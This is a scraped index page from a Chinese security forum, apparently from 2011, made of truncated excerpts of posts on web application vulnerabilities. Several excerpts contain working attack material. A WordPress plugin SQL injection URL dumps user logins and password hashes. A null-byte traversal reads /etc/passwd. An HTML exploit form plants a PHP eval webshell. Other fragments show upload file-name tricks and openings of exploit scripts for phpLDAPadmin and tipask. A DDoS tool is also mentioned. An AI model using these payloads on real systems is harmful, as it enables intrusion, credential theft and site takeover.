http://hi.baidu.com/micropoor '2011-11-21 星期一 '插入篇---asp篇 '程序员的思维 'Micropoor.asp代码片段 <% '略 dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath dim dirTemplate : dirTemplate="../Upload" dim path : path=getForm("path","get") : if isNul(path) then path= dirTemplate if left(path,9)<>"../Upload" then alert "
多功能教室预约系统留言版上传漏洞
多功能教室预约系统大部分都是学校以及edu在使用 guestbook留言本可以上传图片 上传程序没有随上传日期而改文件名 直接上传aa.asp;v
Wordpress plugin livecalendar SQL injection
/**************************************************** * Wordpress plugin livecalendar SQL injection * From WwW.bhst.OrG Black-Hat Security Team * Author LengF Contact:81sec.com ****************************************************/ 漏洞文件: wp-content/plugins/livecalendar/kcalendar.php POC: http://hackit.com/wp-content/plu ... th=10&catid=-1/**/union/**/select/**/user_login,user_pass/**/from wp_users/* 这个injection比较低级,不过这个插件貌似网上很难找到。分享给大家,
Php安全新闻早8点(2011-11-20 星期日)
http://hi.baidu.com/micropoor '2011-11-20 星期日 '插入篇---asp篇 '程序员的思维 'Micropoor.asp代码片段 <% dim upload,file,formName,formPath,iCount,fileformat //......略 end function formPath="2010/" //......略 set file=upload.file(formName) '
Php安全新闻早8点(2011-11-19 星期六)
http://hi.baidu.com/micropoor //2011-11-19 星期六 //程序员的思维 //Micropoor.php代码片段 <?php //略 $modd=$_GET[mod]; … if(!$tpl->isCached(INDEX_TEMPLATE."product_".$modd.".".$tplext,$cacheid)){ require_once './source/module/$modd.php'; //略 } //我们的思维 index.php?mod=../../1.php%00 //其他条件 php.ini allow_url_fopen=on /
JspRun 后台拿 shell - 脚本漏洞
By:clannad JspRun是一个高度模仿Discuz!的jsp脚本bbs。。目前版本为6.0 基本和dz6.0界面,用法相同。。好了。。
phpweb解析不当加上传漏洞
漏洞详情简要描述:新版的phpweb 存在这上传和解析不当漏洞 详细说明: <input type="hidden" name="filepath" value="Account/adminindex/1.asp;"> <input type="hidden" name="filelx" value="jpg"> 漏洞证明:exp 上传shell.php.jpg <form
星网互动建站系统上传漏洞
By:狗一样的男人 小菜我珍藏了几枚漏洞 现在再发一枚,不知道前面有没有大牛发过,但是我搞这个洞的时候发现都输处.... 希望大家多多支持
柏顿文章管理系统无限制上传漏洞 - 脚本漏洞
By:狗一样的男人 (这ID,囧~~) 小菜我前两天闲着没事下载程序挖掘漏洞 然后就挖掘了这个小漏洞,大牛们不要喷 希望大牛们多多带带我 漏洞详情简要
GoCDKEY 游戏推广系统上传漏洞 - 脚本漏洞
By:piaoye 因需要下了源码看了下 出现在 \inc\img_save.asp 文件 以下是引用片段: ....省略一千万行.... set fs=server.CreateObject("scripting.filesystemobject") set upload=new upload_5xSoft ''建立上传对象 '------
Xiuno BBS 后台拿 shell - 脚本漏洞
By:clannad 不知道有人发过没。。没办法查询。只好冒充原创。。 目前各版本均可以。 登陆后台,点击其他功能下面的友情链接。(登陆后台 --> 其他
万博企业网站管理系统注入漏洞
作者:流浪的风 这两天拿站的时候,好几回都遇到个叫万博的企业管理系统,今天有时间就下载过来看了看,找到了个注入漏洞,郁闷的是,得手工,没法
phpLDAPadmin <= 1.2.1.1 (query_engine) 远程PHP代码注入漏洞
<?php /* ------------------------------------------------------------------------ phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit ------------------------------------------------------------------------ author...............: EgiX mail.................: n0b0d13s[at]gmail[dot]com software link........: http://phpldapadmin.sourceforge.net/ affected versions....: from 1.2.0 to 1.2.1.1 +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+
【原创】关于感恩节、关于国人、关于感恩之心、还关于T00ls
By:Nuclear'Atk,At:2011-11-19 19:22:19。 前言: 忽然由西方的感恩节,想到的一些东西,略有感触,难以释怀,果断
PHP Web 木马扫描器 - 安全测试工具
scanner.php: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba */ /* [+] QQ: 1499281192 */ /* [+] MSN: weeming21@hotmail.com */ /* [+] 首发: t00ls.net
浅析php后门木马 - 技术文章
浅析php后门木马 作者:alibaba 首发:t00ls.net , 转载请注明t00ls php后门木马对大家来说一点都不
嘉缘人才系统漏洞
By:毅心毅意 为什么会出现漏洞...看这里 http://www.exploit-db.com/exploits/18075/ exp: jiayun.html: <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"><input type="text" value="http://127.0.0.1/freditor/plugins/ajaxfilemanager/ajax_create_folder.php" name="doaction" style="width:400"><br /><input type="text" value="<?php eval($_POST[t00ls])?>" name="foo" style="width:400"><br /><input type="submit" value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){ document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>
某企业网站整站漏洞
By:muhuohacker 关键词 inurl:NewsClass.asp?BigClass=企业新闻 此漏洞主要是因为虽然加入了通用的防注入系
UCHOME 2.0 后台GET Shell - 脚本漏洞
UCHOME 2.0 后台GET Shell 作者: alibaba 首发:t00ls.net , 转载请注明 t00ls 还记得陆羽那个UCHOME 2.0 后台GET Shell吧? 官方真的修复了
tipask 1.4 问答系统上传漏洞 exp
By:lostwolf 搜索:tiltle:"tipask问答网" 第一次根据别人的exp写的 大牛勿喷. Exp: <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); $host = rtrim(ltrim($argv[1],'http://'),'/'); $path = ereg_replace("(/){2,}", "/", $argv[2]);
电磁风暴超暴力 PHP DDOS 攻击工具 & PHP DDOS 攻击 - 编年史
↑ 点击图片查看高清无码大图 ↑ 警告:以下内容纯属意淫,如有雷同,绝无可能! 末日时钟 核爆 关于互联网上目前流传的 PHP DDOS 相关的工具: 我告诉你,现在网上
Php安全新闻早8点(2011-11-18 星期五)
转载自:http://hi.baidu.com/micropoor //2011-11-18 星期五 //知识点讲解:urlencode //返回字符串,此
Php安全新闻早8点(2011-11-17 星期四) - 技术文章
转载自:http://hi.baidu.com/micropoor //特别篇-------实战篇 //2011-11-17 星期四 //环境:win+php
Php安全新闻早8点(2011-11-16 星期三) - 技术文章
转载自:http://hi.baidu.com/micropoor //2011-11-16 星期三 // 程序员的思维: // Micropoor.php ---代码片段 <?php $Micropoor=$_GET[Micropoor]; include($Micropoor.'php'); ?> //我们的思维: http://www.127.0.0.1/Micropoor.php?Micropoor=/../../../../../etc/passwd%00 //
tipask问答系统1.4上传漏洞 - 脚本漏洞
By:心灵 为了响应oldjun的号召。。发点小洞........呵呵..给位给力吧。荣誉会员等着你。。话说毅心毅意美眉还不给力啊。珍藏这
tipask问答系统1.3注入漏洞 - 脚本漏洞
By:毅心毅意 为了响应oldjun的号召。。发点小洞........呵呵..给位给力吧。荣誉会员等着你。。话说心灵美眉还不给力啊。珍藏这
长安刺客 - 旁注杀手 v1.2 版 + CDN 终结者 v1.1 发布
免责声明,蛋疼者,不疼则已,一疼死人: 1.t00ls访问授权: t00ls的技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进
ANSI与Unicode互转 - ANSI编码的一句话以Unicode方式显示
看到论坛有人讨论这个,就蛋疼的写了个科普文章,文章逻辑有点乱,将就着看吧。 一提到 asa、asp 后缀的 Access 数据库(.mdb),都知道数据库插马,
“限量赞助t00ls,回馈邀请码”;改革荣誉会员制度;改革邀请制度
From:迎接感恩节,“限量赞助t00ls,回馈邀请码”;改革荣誉会员制度;改革邀请制度,By:oldjun。 一方面感恩节临近了,为了感谢所
Php安全新闻早8点(2011-11-15 星期二)
转载自:http://hi.baidu.com/micropoor //2011-11-15 星期二 // 管理员的思维: 查找asp,php,jsp,.net脚本文件关键